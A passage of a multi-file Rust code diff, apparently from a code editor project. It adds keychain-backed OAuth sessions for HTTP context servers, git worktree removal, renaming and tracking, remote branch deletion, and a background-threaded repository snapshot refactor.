+ Self::store_session(&credentials_provider, &server_url, &session, cx)
+ .await
+ .context("Failed to persist OAuth session in keychain")?;
+
+ let token_provider = Self::create_oauth_token_provider(
+ &id,
+ &server_url,
+ session,
+ http_client.clone(),
+ credentials_provider,
+ cx,
+ );
+
+ let new_server = this.update(cx, |this, cx| {
+ let global_timeout =
+ Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout;
+
+ match configuration.as_ref() {
+ ContextServerConfiguration::Http {
+ url,
+ headers,
+ timeout,
+ } => {
+ let transport = HttpTransport::new_with_token_provider(
+ http_client.clone(),
+ url.to_string(),
+ headers.clone(),
+ cx.background_executor().clone(),
+ Some(token_provider.clone()),
+ );
+ Ok(Arc::new(ContextServer::new_with_timeout(
+ id.clone(),
+ Arc::new(transport),
+ Some(Duration::from_secs(
+ timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS),
+ )),
+ )))
+ }
+ _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"),
+ }
+ })??;
+
+ this.update(cx, |this, cx| {
+ this.run_server(new_server, configuration, cx);
+ })?;
+
+ Ok(())
+ }
+
+ /// Store the full OAuth session in the system keychain, keyed by the
+ /// server's canonical URI.
+ async fn store_session(
+ credentials_provider: &Arc<dyn CredentialsProvider>,
+ server_url: &url::Url,
+ session: &OAuthSession,
+ cx: &AsyncApp,
+ ) -> Result<()> {
+ let key = Self::keychain_key(server_url);
+ let json = serde_json::to_string(session)?;
+ credentials_provider
+ .write_credentials(&key, "mcp-oauth", json.as_bytes(), cx)
+ .await
+ }
+
+ /// Load the full OAuth session from the system keychain for the given
+ /// server URL.
+ async fn load_session(
+ credentials_provider: &Arc<dyn CredentialsProvider>,
+ server_url: &url::Url,
+ cx: &AsyncApp,
+ ) -> Result<Option<OAuthSession>> {
+ let key = Self::keychain_key(server_url);
+ match credentials_provider.read_credentials(&key, cx).await? {
+ Some((_username, password_bytes)) => {
+ let session: OAuthSession = serde_json::from_slice(&password_bytes)?;
+ Ok(Some(session))
+ }
+ None => Ok(None),
+ }
+ }
+
+ /// Clear the stored OAuth session from the system keychain.
+ async fn clear_session(
+ credentials_provider: &Arc<dyn CredentialsProvider>,
+ server_url: &url::Url,
+ cx: &AsyncApp,
+ ) -> Result<()> {
+ let key = Self::keychain_key(server_url);
+ credentials_provider.delete_credentials(&key, cx).await
+ }
+
+ fn keychain_key(server_url: &url::Url) -> String {
+ format!("mcp-oauth:{}", oauth::canonical_server_uri(server_url))
+ }
+
+ /// Log out of an OAuth-authenticated MCP server: clear the stored OAuth
+ /// session from the keychain and stop the server.
+ pub fn logout_server(&mut self, id: &ContextServerId, cx: &mut Context<Self>) -> Result<()> {
+ let state = self.servers.get(id).context("Context server not found")?;
+ let configuration = state.configuration();
+
+ let server_url = match configuration.as_ref() {
+ ContextServerConfiguration::Http { url, .. } => url.clone(),
+ _ => anyhow::bail!("logout only applies to HTTP servers with OAuth"),
+ };
+
+ let id = id.clone();
+ self.stop_server(&id, cx)?;
+
+ cx.spawn(async move |this, cx| {
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await {
+ log::error!("{} failed to clear OAuth session: {}", id, err);
+ }
+ // Trigger server recreation so the next start uses a fresh
+ // transport without the old (now-invalidated) token provider.
+ this.update(cx, |this, cx| {
+ this.available_context_servers_changed(cx);
+ })
+ .log_err();
+ })
+ .detach();
+
+ Ok(())
+ }
+
fn update_server_state(
&mut self,
id: ContextServerId,
@@ -1014,3 +1402,104 @@ impl ContextServerStore {
Ok(())
}
}
+
+/// Determines the appropriate server state after a start attempt fails.
+///
+/// When the error is an HTTP 401 with no static auth header configured,
+/// attempts OAuth discovery so the UI can offer an authentication flow.
+async fn resolve_start_failure(
+ id: &ContextServerId,
+ err: anyhow::Error,
+ server: Arc<ContextServer>,
+ configuration: Arc<ContextServerConfiguration>,
+ cx: &AsyncApp,
+) -> ContextServerState {
+ let www_authenticate = err.downcast_ref::<TransportError>().map(|e| match e {
+ TransportError::AuthRequired { www_authenticate } => www_authenticate.clone(),
+ });
+
+ if www_authenticate.is_some() && configuration.has_static_auth_header() {
+ log::warn!("{id} received 401 with a static Authorization header configured");
+ return ContextServerState::Error {
+ configuration,
+ server,
+ error: "Server returned 401 Unauthorized. Check your configured Authorization header."
+ .into(),
+ };
+ }
+
+ let server_url = match configuration.as_ref() {
+ ContextServerConfiguration::Http { url, .. } if !configuration.has_static_auth_header() => {
+ url.clone()
+ }
+ _ => {
+ if www_authenticate.is_some() {
+ log::error!("{id} got OAuth 401 on a non-HTTP transport or with static auth");
+ } else {
+ log::error!("{id} context server failed to start: {err}");
+ }
+ return ContextServerState::Error {
+ configuration,
+ server,
+ error: err.to_string().into(),
+ };
+ }
+ };
+
+ // When the error is NOT a 401 but there is a cached OAuth session in the
+ // keychain, the session is likely stale/expired and caused the failure
+ // (e.g. timeout because the server rejected the token silently). Clear it
+ // so the next start attempt can get a clean 401 and trigger the auth flow.
+ if www_authenticate.is_none() {
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ match ContextServerStore::load_session(&credentials_provider, &server_url, cx).await {
+ Ok(Some(_)) => {
+ log::info!("{id} start failed with a cached OAuth session present; clearing it");
+ ContextServerStore::clear_session(&credentials_provider, &server_url, cx)
+ .await
+ .log_err();
+ }
+ _ => {
+ log::error!("{id} context server failed to start: {err}");
+ return ContextServerState::Error {
+ configuration,
+ server,
+ error: err.to_string().into(),
+ };
+ }
+ }
+ }
+
+ let default_www_authenticate = oauth::WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+ let www_authenticate = www_authenticate
+ .as_ref()
+ .unwrap_or(&default_www_authenticate);
+ let http_client = cx.update(|cx| cx.http_client());
+
+ match context_server::oauth::discover(&http_client, &server_url, www_authenticate).await {
+ Ok(discovery) => {
+ log::info!(
+ "{id} requires OAuth authorization (auth server: {})",
+ discovery.auth_server_metadata.issuer,
+ );
+ ContextServerState::AuthRequired {
+ server,
+ configuration,
+ discovery: Arc::new(discovery),
+ }
+ }
+ Err(discovery_err) => {
+ log::error!("{id} OAuth discovery failed: {discovery_err}");
+ ContextServerState::Error {
+ configuration,
+ server,
+ error: format!("OAuth discovery failed: {discovery_err}").into(),
+ }
+ }
+ }
+}
@@ -2187,21 +2187,27 @@ impl Session {
self.capabilities.supports_restart_request.unwrap_or(false) && !self.is_terminated();
self.restart_task = Some(cx.spawn(async move |this, cx| {
- let _ = this.update(cx, |session, cx| {
+ this.update(cx, |session, cx| {
if supports_dap_restart {
- session
- .request(
- RestartCommand {
- raw: args.unwrap_or(Value::Null),
- },
- Self::fallback_to_manual_restart,
- cx,
- )
- .detach();
+ session.request(
+ RestartCommand {
+ raw: args.unwrap_or(Value::Null),
+ },
+ Self::fallback_to_manual_restart,
+ cx,
+ )
} else {
cx.emit(SessionStateEvent::Restart);
+ Task::ready(None)
}
- });
+ })
+ .unwrap_or_else(|_| Task::ready(None))
+ .await;
+
+ this.update(cx, |session, _cx| {
+ session.restart_task = None;
+ })
+ .ok();
}));
}
@@ -293,6 +293,7 @@ pub struct RepositorySnapshot {
pub remote_origin_url: Option<String>,
pub remote_upstream_url: Option<String>,
pub stash_entries: GitStash,
+ pub linked_worktrees: Arc<[GitWorktree]>,
}
type JobId = u64;
@@ -429,6 +430,7 @@ pub enum RepositoryEvent {
StatusesChanged,
BranchChanged,
StashEntriesChanged,
+ GitWorktreeListChanged,
PendingOpsChanged { pending_ops: SumTree<PendingOps> },
GraphEvent((LogSource, LogOrder), GitGraphEvent),
}
@@ -578,6 +580,8 @@ impl GitStore {
client.add_entity_request_handler(Self::handle_git_clone);
client.add_entity_request_handler(Self::handle_get_worktrees);
client.add_entity_request_handler(Self::handle_create_worktree);
+ client.add_entity_request_handler(Self::handle_remove_worktree);
+ client.add_entity_request_handler(Self::handle_rename_worktree);
}
pub fn is_local(&self) -> bool {
@@ -2384,6 +2388,44 @@ impl GitStore {
Ok(proto::Ack {})
}
+ async fn handle_remove_worktree(
+ this: Entity<Self>,
+ envelope: TypedEnvelope<proto::GitRemoveWorktree>,
+ mut cx: AsyncApp,
+ ) -> Result<proto::Ack> {
+ let repository_id = RepositoryId::from_proto(envelope.payload.repository_id);
+ let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?;
+ let path = PathBuf::from(envelope.payload.path);
+ let force = envelope.payload.force;
+
+ repository_handle
+ .update(&mut cx, |repository_handle, _| {
+ repository_handle.remove_worktree(path, force)
+ })
+ .await??;
+
+ Ok(proto::Ack {})
+ }
+
+ async fn handle_rename_worktree(
+ this: Entity<Self>,
+ envelope: TypedEnvelope<proto::GitRenameWorktree>,
+ mut cx: AsyncApp,
+ ) -> Result<proto::Ack> {
+ let repository_id = RepositoryId::from_proto(envelope.payload.repository_id);
+ let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?;
+ let old_path = PathBuf::from(envelope.payload.old_path);
+ let new_path = PathBuf::from(envelope.payload.new_path);
+
+ repository_handle
+ .update(&mut cx, |repository_handle, _| {
+ repository_handle.rename_worktree(old_path, new_path)
+ })
+ .await??;
+
+ Ok(proto::Ack {})
+ }
+
async fn handle_get_branches(
this: Entity<Self>,
envelope: TypedEnvelope<proto::GitGetBranches>,
@@ -2501,11 +2543,12 @@ impl GitStore {
) -> Result<proto::Ack> {
let repository_id = RepositoryId::from_proto(envelope.payload.repository_id);
let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?;
+ let is_remote = envelope.payload.is_remote;
let branch_name = envelope.payload.branch_name;
repository_handle
.update(&mut cx, |repository_handle, _| {
- repository_handle.delete_branch(branch_name)
+ repository_handle.delete_branch(is_remote, branch_name)
})
.await??;
@@ -3535,6 +3578,7 @@ impl RepositorySnapshot {
remote_origin_url: None,
remote_upstream_url: None,
stash_entries: Default::default(),
+ linked_worktrees: Arc::from([]),
path_style,
}
}
@@ -3573,6 +3617,11 @@ impl RepositorySnapshot {
original_repo_abs_path: Some(
self.original_repo_abs_path.to_string_lossy().into_owned(),
),
+ linked_worktrees: self
+ .linked_worktrees
+ .iter()
+ .map(worktree_to_proto)
+ .collect(),
}
}
@@ -3649,9 +3698,18 @@ impl RepositorySnapshot {
original_repo_abs_path: Some(
self.original_repo_abs_path.to_string_lossy().into_owned(),
),
+ linked_worktrees: self
+ .linked_worktrees
+ .iter()
+ .map(worktree_to_proto)
+ .collect(),
}
}
+ pub fn linked_worktrees(&self) -> &[GitWorktree] {
+ &self.linked_worktrees
+ }
+
pub fn status(&self) -> impl Iterator<Item = StatusEntry> + '_ {
self.statuses_by_path.iter().cloned()
}
@@ -4965,43 +5023,69 @@ impl Repository {
}
pub fn stage_all(&mut self, cx: &mut Context<Self>) -> Task<anyhow::Result<()>> {
- let to_stage = self
- .cached_status()
- .filter_map(|entry| {
- if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) {
- if ops.staging() || ops.staged() {
+ let snapshot = self.snapshot.clone();
+ let pending_ops = self.pending_ops.clone();
+ let to_stage = cx.background_spawn(async move {
+ snapshot
+ .status()
+ .filter_map(|entry| {
+ if let Some(ops) =
+ pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ())
+ {
+ if ops.staging() || ops.staged() {
+ None
+ } else {
+ Some(entry.repo_path)
+ }
+ } else if entry.status.staging().is_fully_staged() {
None
} else {
Some(entry.repo_path)
}
- } else if entry.status.staging().is_fully_staged() {
- None
- } else {
- Some(entry.repo_path)
- }
- })
- .collect();
- self.stage_or_unstage_entries(true, to_stage, cx)
+ })
+ .collect()
+ });
+
+ cx.spawn(async move |this, cx| {
+ let to_stage = to_stage.await;
+ this.update(cx, |this, cx| {
+ this.stage_or_unstage_entries(true, to_stage, cx)
+ })?
+ .await
+ })
}
pub fn unstage_all(&mut self, cx: &mut Context<Self>) -> Task<anyhow::Result<()>> {
- let to_unstage = self
- .cached_status()
- .filter_map(|entry| {
- if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) {
- if !ops.staging() && !ops.staged() {
+ let snapshot = self.snapshot.clone();
+ let pending_ops = self.pending_ops.clone();
+ let to_unstage = cx.background_spawn(async move {
+ snapshot
+ .status()
+ .filter_map(|entry| {
+ if let Some(ops) =
+ pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ())
+ {
+ if !ops.staging() && !ops.staged() {
+ None
+ } else {
+ Some(entry.repo_path)
+ }
+ } else if entry.status.staging().is_fully_unstaged() {
None
} else {
Some(entry.repo_path)
}
- } else if entry.status.staging().is_fully_unstaged() {
- None
- } else {
- Some(entry.repo_path)
- }
- })
- .collect();
- self.stage_or_unstage_entries(false, to_unstage, cx)
+ })
+ .collect()
+ });
+
+ cx.spawn(async move |this, cx| {
+ let to_unstage = to_unstage.await;
+ this.update(cx, |this, cx| {
+ this.stage_or_unstage_entries(false, to_unstage, cx)
+ })?
+ .await
+ })
}
pub fn stash_all(&mut self, cx: &mut Context<Self>) -> Task<anyhow::Result<()>> {
@@ -5671,6 +5755,31 @@ impl Repository {
})
}
+ /// If this is a linked worktree (*NOT* the main checkout of a repository),
+/// returns the path of the linked worktree.
+ ///
+ /// Returns None if this is the main checkout.
+ pub fn linked_worktree_path(&self) -> Option<&Arc<Path>> {
+ if self.work_directory_abs_path != self.original_repo_abs_path {
+ Some(&self.work_directory_abs_path)
+ } else {
+ None
+ }
+ }
+
+ pub fn path_for_new_linked_worktree(
+ &self,
+ branch_name: &str,
+ worktree_directory_setting: &str,
+ ) -> Result<PathBuf> {
+ let original_repo = self.original_repo_abs_path.clone();
+ let project_name = original_repo
+ .file_name()
+ .ok_or_else(|| anyhow!("git repo must have a directory name"))?;
+ let directory = worktrees_directory_for_repo(&original_repo, worktree_directory_setting)?;
+ Ok(directory.join(branch_name).join(project_name))
+ }
+
pub fn worktrees(&mut self) -> oneshot::Receiver<Result<Vec<GitWorktree>>> {
let id = self.id;
self.send_job(None, move |repo, _| async move {
@@ -5700,25 +5809,25 @@ impl Repository {
pub fn create_worktree(
&mut self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
commit: Option<String>,
) -> oneshot::Receiver<Result<()>> {
let id = self.id;
self.send_job(
- Some("git worktree add".into()),
+ Some(format!("git worktree add: {}", branch_name).into()),
move |repo, _cx| async move {
match repo {
RepositoryState::Local(LocalRepositoryState { backend, .. }) => {
- backend.create_worktree(name, directory, commit).await
+ backend.create_worktree(branch_name, path, commit).await
}
RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
client
.request(proto::GitCreateWorktree {
project_id: project_id.0,
repository_id: id.to_proto(),
- name,
- directory: directory.to_string_lossy().to_string(),
+ name: branch_name,
+ directory: path.to_string_lossy().to_string(),
commit,
})
.await?;
@@ -5731,6 +5840,7 @@ impl Repository {
}
pub fn remove_worktree(&mut self, path: PathBuf, force: bool) -> oneshot::Receiver<Result<()>> {
+ let id = self.id;
self.send_job(
Some(format!("git worktree remove: {}", path.display()).into()),
move |repo, _cx| async move {
@@ -5738,10 +5848,47 @@ impl Repository {
RepositoryState::Local(LocalRepositoryState { backend, .. }) => {
backend.remove_worktree(path, force).await
}
- RepositoryState::Remote(_) => {
- anyhow::bail!(
- "Removing worktrees on remote repositories is not yet supported"
- )
+ RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
+ client
+ .request(proto::GitRemoveWorktree {
+ project_id: project_id.0,
+ repository_id: id.to_proto(),
+ path: path.to_string_lossy().to_string(),
+ force,
+ })
+ .await?;
+
+ Ok(())
+ }
+ }
+ },
+ )
+ }
+
+ pub fn rename_worktree(
+ &mut self,
+ old_path: PathBuf,
+ new_path: PathBuf,
+ ) -> oneshot::Receiver<Result<()>> {
+ let id = self.id;
+ self.send_job(
+ Some(format!("git worktree move: {}", old_path.display()).into()),
+ move |repo, _cx| async move {
+ match repo {
+ RepositoryState::Local(LocalRepositoryState { backend, .. }) => {
+ backend.rename_worktree(old_path, new_path).await
+ }
+ RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
+ client
+ .request(proto::GitRenameWorktree {
+ project_id: project_id.0,
+ repository_id: id.to_proto(),
+ old_path: old_path.to_string_lossy().to_string(),
+ new_path: new_path.to_string_lossy().to_string(),
+ })
+ .await?;
+
+ Ok(())
}
}
},
@@ -5923,18 +6070,32 @@ impl Repository {
)
}
- pub fn delete_branch(&mut self, branch_name: String) -> oneshot::Receiver<Result<()>> {
+ pub fn delete_branch(
+ &mut self,
+ is_remote: bool,
+ branch_name: String,
+ ) -> oneshot::Receiver<Result<()>> {
let id = self.id;
self.send_job(
- Some(format!("git branch -d {branch_name}").into()),
+ Some(
+ format!(
+ "git branch {} {}",
+ if is_remote { "-dr" } else { "-d" },
+ branch_name
+ )
+ .into(),
+ ),
move |repo, _cx| async move {
match repo {
- RepositoryState::Local(state) => state.backend.delete_branch(branch_name).await,
+ RepositoryState::Local(state) => {
+ state.backend.delete_branch(is_remote, branch_name).await
+ }
RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
client
.request(proto::GitDeleteBranch {
project_id: project_id.0,
repository_id: id.to_proto(),
+ is_remote,
branch_name,
})
.await?;
@@ -6067,6 +6228,15 @@ impl Repository {
cx.emit(RepositoryEvent::StashEntriesChanged)
}
self.snapshot.stash_entries = new_stash_entries;
+ let new_linked_worktrees: Arc<[GitWorktree]> = update
+ .linked_worktrees
+ .iter()
+ .map(proto_to_worktree)
+ .collect();
+ if *self.snapshot.linked_worktrees != *new_linked_worktrees {
+ cx.emit(RepositoryEvent::GitWorktreeListChanged);
+ }
+ self.snapshot.linked_worktrees = new_linked_worktrees;
self.snapshot.remote_upstream_url = update.remote_upstream_url;
self.snapshot.remote_origin_url = update.remote_origin_url;
@@ -6175,22 +6345,9 @@ impl Repository {
let RepositoryState::Local(LocalRepositoryState { backend, .. }) = state else {
bail!("not a local repository")
};
- let compute_snapshot = this.update(&mut cx, |this, _| {
- this.paths_needing_status_update.clear();
- compute_snapshot(
- this.id,
- this.work_directory_abs_path.clone(),
- this.snapshot.clone(),
- backend.clone(),
- )
- });
- let (snapshot, events) = cx.background_spawn(compute_snapshot).await?;
+ let snapshot = compute_snapshot(this.clone(), backend.clone(), &mut cx).await?;
this.update(&mut cx, |this, cx| {
- this.snapshot = snapshot.clone();
this.clear_pending_ops(cx);
- for event in events {
- cx.emit(event);
- }
});
if let Some(updates_tx) = updates_tx {
updates_tx
@@ -6571,6 +6728,120 @@ impl Repository {
}
}
+/// If `path` is a git linked worktree checkout, resolves it to the main
+/// repository's working directory path. Returns `None` if `path` is a normal
+/// repository, not a git repo, or if resolution fails.
+///
+/// Resolution works by:
+/// 1. Reading the `.git` file to get the `gitdir:` pointer
+/// 2. Following that to the worktree-specific git directory
+/// 3. Reading the `commondir` file to find the shared `.git` directory
+/// 4. Deriving the main repo's working directory from the common dir
+pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Option<PathBuf> {
+ let dot_git = path.join(".git");
+ let metadata = fs.metadata(&dot_git).await.ok()??;
+ if metadata.is_dir {
+ return None; // Normal repo, not a linked worktree
+ }
+ // It's a .git file — parse the gitdir: pointer
+ let content = fs.load(&dot_git).await.ok()?;
+ let gitdir_rel = content.strip_prefix("gitdir:")?.trim();
+ let gitdir_abs = fs.canonicalize(&path.join(gitdir_rel)).await.ok()?;
+ // Read commondir to find the main .git directory
+ let commondir_content = fs.load(&gitdir_abs.join("commondir")).await.ok()?;
+ let common_dir = fs
+ .canonicalize(&gitdir_abs.join(commondir_content.trim()))
+ .await
+ .ok()?;
+ Some(git::repository::original_repo_path_from_common_dir(
+ &common_dir,
+ ))
+}
+
+/// Validates that the resolved worktree directory is acceptable:
+/// - The setting must not be an absolute path.
+/// - The resolved path must be either a subdirectory of the working
+/// directory or a subdirectory of its parent (i.e., a sibling).
+///
+/// Returns `Ok(resolved_path)` or an error with a user-facing message.
+pub fn worktrees_directory_for_repo(
+ original_repo_abs_path: &Path,
+ worktree_directory_setting: &str,
+) -> Result<PathBuf> {
+ // Check the original setting before trimming, since a path like "///"
+ // is absolute but becomes "" after stripping trailing separators.
+ // Also check for leading `/` or `\` explicitly, because on Windows
+ // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees`
+ // would slip through even though it's clearly not a relative path.
+ if Path::new(worktree_directory_setting).is_absolute()
+ || worktree_directory_setting.starts_with('/')
+ || worktree_directory_setting.starts_with('\\')
+ {
+ anyhow::bail!(
+ "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}"
+ );
+ }
+
+ if worktree_directory_setting.is_empty() {
+ anyhow::bail!("git.worktree_directory must not be empty");
+ }
+
+ let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']);
+ if trimmed == ".." {
+ anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)");
+ }
+
+ let joined = original_repo_abs_path.join(trimmed);
+ let resolved = util::normalize_path(&joined);
+ let resolved = if resolved.starts_with(original_repo_abs_path) {
+ resolved
+ } else if let Some(repo_dir_name) = original_repo_abs_path.file_name() {
+ resolved.join(repo_dir_name)
+ } else {
+ resolved
+ };
+
+ let parent = original_repo_abs_path
+ .parent()
+ .unwrap_or(original_repo_abs_path);
+
+ if !resolved.starts_with(parent) {
+ anyhow::bail!(
+ "git.worktree_directory resolved to {resolved:?}, which is outside \
+ the project root and its parent directory. It must resolve to a \
+ subdirectory of {original_repo_abs_path:?} or a sibling of it."
+ );
+ }
+
+ Ok(resolved)
+}
+
+/// Returns a short name for a linked worktree suitable for UI display
+///
+/// Uses the main worktree path to come up with a short name that disambiguates
+/// the linked worktree from the main worktree.
+pub fn linked_worktree_short_name(
+ main_worktree_path: &Path,
+ linked_worktree_path: &Path,
+) -> Option<SharedString> {
+ if main_worktree_path == linked_worktree_path {
+ return None;
+ }
+
+ let project_name = main_worktree_path.file_name()?.to_str()?;
+ let directory_name = linked_worktree_path.file_name()?.to_str()?;
+ let name = if directory_name != project_name {
+ directory_name.to_string()
+ } else {
+ linked_worktree_path
+ .parent()?
+ .file_name()?
+ .to_str()?
+ .to_string()
+ };
+ Some(name.into())
+}
+
fn get_permalink_in_rust_registry_src(
provider_registry: Arc<GitHostingProviderRegistry>,
path: PathBuf,
@@ -6734,7 +7005,11 @@ fn branch_to_proto(branch: &git::repository::Branch) -> proto::Branch {
fn worktree_to_proto(worktree: &git::repository::Worktree) -> proto::Worktree {
proto::Worktree {
path: worktree.path.to_string_lossy().to_string(),
- ref_name: worktree.ref_name.to_string(),
+ ref_name: worktree
+ .ref_name
+ .as_ref()
+ .map(|s| s.to_string())
+ .unwrap_or_default(),
sha: worktree.sha.to_string(),
}
}
@@ -6742,7 +7017,7 @@ fn worktree_to_proto(worktree: &git::repository::Worktree) -> proto::Worktree {
fn proto_to_worktree(proto: &proto::Worktree) -> git::repository::Worktree {
git::repository::Worktree {
path: PathBuf::from(proto.path.clone()),
- ref_name: proto.ref_name.clone().into(),
+ ref_name: Some(SharedString::from(&proto.ref_name)),
sha: proto.sha.clone().into(),
}
}
@@ -6799,41 +7074,124 @@ fn proto_to_commit_details(proto: &proto::GitCommitDetails) -> CommitDetails {
}
}
+/// This function computes the repository snapshot on the foreground thread while
+/// running the git commands on the background thread. We update branch, head,
+/// remotes, and worktrees first so the UI can react sooner, then compute file
+/// state and emit those events immediately after.
async fn compute_snapshot(
- id: RepositoryId,
- work_directory_abs_path: Arc<Path>,
- prev_snapshot: RepositorySnapshot,
+ this: Entity<Repository>,
backend: Arc<dyn GitRepository>,
-) -> Result<(RepositorySnapshot, Vec<RepositoryEvent>)> {
- let mut events = Vec::new();
- let branches = backend.branches().await?;
- let branch = branches.into_iter().find(|branch| branch.is_head);
+ cx: &mut AsyncApp,
+) -> Result<RepositorySnapshot> {
+ let (id, work_directory_abs_path, prev_snapshot) = this.update(cx, |this, _| {
+ this.paths_needing_status_update.clear();
+ (
+ this.id,
+ this.work_directory_abs_path.clone(),
+ this.snapshot.clone(),
+ )
+ });
- // Useful when branch is None in detached head state
- let head_commit = match backend.head_sha().await {
- Some(head_sha) => backend.show(head_sha).await.log_err(),
- None => None,
+ let head_commit_future = {
+ let backend = backend.clone();
+ async move {
+ Ok(match backend.head_sha().await {
+ Some(head_sha) => backend.show(head_sha).await.log_err(),
+ None => None,
+ })
+ }
};
+ let (branches, head_commit, all_worktrees) = cx
+ .background_spawn({
+ let backend = backend.clone();
+ async move {
+ futures::future::try_join3(
+ backend.branches(),
+ head_commit_future,
+ backend.worktrees(),
+ )
+ .await
+ }
+ })
+ .await?;
+ let branch = branches.into_iter().find(|branch| branch.is_head);
- let diff_stat_future: BoxFuture<'_, Result<status::GitDiffStat>> = if head_commit.is_some() {
- backend.diff_stat(&[])
- } else {
- future::ready(Ok(status::GitDiffStat {
- entries: Arc::default(),
- }))
- .boxed()
- };
- let (statuses, diff_stats) = futures::future::try_join(
- backend.status(&[RepoPath::from_rel_path(
- &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(),
- )]),
- diff_stat_future,
- )
- .await?;
+ let linked_worktrees: Arc<[GitWorktree]> = all_worktrees
+ .into_iter()
+ .filter(|wt| wt.path != *work_directory_abs_path)
+ .collect();
+
+ let (remote_origin_url, remote_upstream_url) = cx
+ .background_spawn({
+ let backend = backend.clone();
+ async move {
+ Ok::<_, anyhow::Error>(
+ futures::future::join(
+ backend.remote_url("origin"),
+ backend.remote_url("upstream"),
+ )
+ .await,
+ )
+ }
+ })
+ .await?;
+
+ let snapshot = this.update(cx, |this, cx| {
+ let branch_changed =
+ branch != this.snapshot.branch || head_commit != this.snapshot.head_commit;
+ let worktrees_changed = *linked_worktrees != *this.snapshot.linked_worktrees;
+
+ this.snapshot = RepositorySnapshot {
+ id,
+ work_directory_abs_path,
+ branch,
+ head_commit,
+ remote_origin_url,
+ remote_upstream_url,
+ linked_worktrees,
+ scan_id: prev_snapshot.scan_id + 1,
+ ..prev_snapshot
+ };
+
+ if branch_changed {
+ cx.emit(RepositoryEvent::BranchChanged);
+ }
+
+ if worktrees_changed {
+ cx.emit(RepositoryEvent::GitWorktreeListChanged);
+ }
+
+ this.snapshot.clone()
+ });
+
+ let (statuses, diff_stats, stash_entries) = cx
+ .background_spawn({
+ let backend = backend.clone();
+ let snapshot = snapshot.clone();
+ async move {
+ let diff_stat_future: BoxFuture<'_, Result<status::GitDiffStat>> =
+ if snapshot.head_commit.is_some() {
+ backend.diff_stat(&[])
+ } else {
+ future::ready(Ok(status::GitDiffStat {
+ entries: Arc::default(),
+ }))
+ .boxed()
+ };
+ futures::future::try_join3(
+ backend.status(&[RepoPath::from_rel_path(
+ &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(),
+ )]),
+ diff_stat_future,
+ backend.stash_entries(),
+ )
+ .await
+ }
+ })
+ .await?;
let diff_stat_map: HashMap<&RepoPath, DiffStat> =
diff_stats.entries.iter().map(|(p, s)| (p, *s)).collect();
- let stash_entries = backend.stash_entries().await?;
let mut conflicted_paths = Vec::new();
let statuses_by_path = SumTree::from_iter(
statuses.entries.iter().map(|(repo_path, status)| {
@@ -6848,37 +7206,35 @@ async fn compute_snapshot(
}),
(),
);
- let mut merge_details = prev_snapshot.merge;
- let conflicts_changed = merge_details.update(&backend, conflicted_paths).await?;
- log::debug!("new merge details: {merge_details:?}");
-
- if conflicts_changed || statuses_by_path != prev_snapshot.statuses_by_path {
- events.push(RepositoryEvent::StatusesChanged)
- }
- if branch != prev_snapshot.branch || head_commit != prev_snapshot.head_commit {
- events.push(RepositoryEvent::BranchChanged);
- }
+ let merge_details = cx
+ .background_spawn({
+ let backend = backend.clone();
+ let mut merge_details = snapshot.merge.clone();
+ async move {
+ let conflicts_changed = merge_details.update(&backend, conflicted_paths).await?;
+ Ok::<_, anyhow::Error>((merge_details, conflicts_changed))
+ }
+ })
+ .await?;
+ let (merge_details, conflicts_changed) = merge_details;
+ log::debug!("new merge details: {merge_details:?}");
- let remote_origin_url = backend.remote_url("origin").await;
- let remote_upstream_url = backend.remote_url("upstream").await;
+ Ok(this.update(cx, |this, cx| {
+ if conflicts_changed || statuses_by_path != this.snapshot.statuses_by_path {
+ cx.emit(RepositoryEvent::StatusesChanged);
+ }
+ if stash_entries != this.snapshot.stash_entries {
+ cx.emit(RepositoryEvent::StashEntriesChanged);
+ }
- let snapshot = RepositorySnapshot {
- id,
- statuses_by_path,
- work_directory_abs_path,
- original_repo_abs_path: prev_snapshot.original_repo_abs_path,
- path_style: prev_snapshot.path_style,
- scan_id: prev_snapshot.scan_id + 1,
- branch,
- head_commit,
- merge: merge_details,
- remote_origin_url,
- remote_upstream_url,
- stash_entries,
- };
+ this.snapshot.scan_id += 1;
+ this.snapshot.merge = merge_details;
+ this.snapshot.statuses_by_path = statuses_by_path;
+ this.snapshot.stash_entries = stash_entries;
- Ok((snapshot, events))
+ this.snapshot.clone()
+ }))
}
fn status_from_proto(
@@ -808,7 +808,10 @@ impl LocalImageStore {
let new_file = if let Some(entry) = snapshot_entry {
worktree::File {
disk_state: match entry.mtime {
- Some(mtime) => DiskState::Present { mtime },
+ Some(mtime) => DiskState::Present {
+ mtime,
+ size: entry.size,
+ },
None => old_file.disk_state,
},
is_local: true,
@@ -2636,11 +2636,10 @@ impl LspCommand for GetCodeActions {
relevant_diagnostics.push(entry.to_lsp_diagnostic_stub()?);
}
- let supported =
- Self::supported_code_action_kinds(language_server.adapter_server_capabilities());
-
let only = if let Some(requested) = &self.kinds {
- if let Some(supported_kinds) = supported {
+ if let Some(supported_kinds) =
+ Self::supported_code_action_kinds(language_server.adapter_server_capabilities())
+ {
let filtered = requested
.iter()
.filter(|requested_kind| {
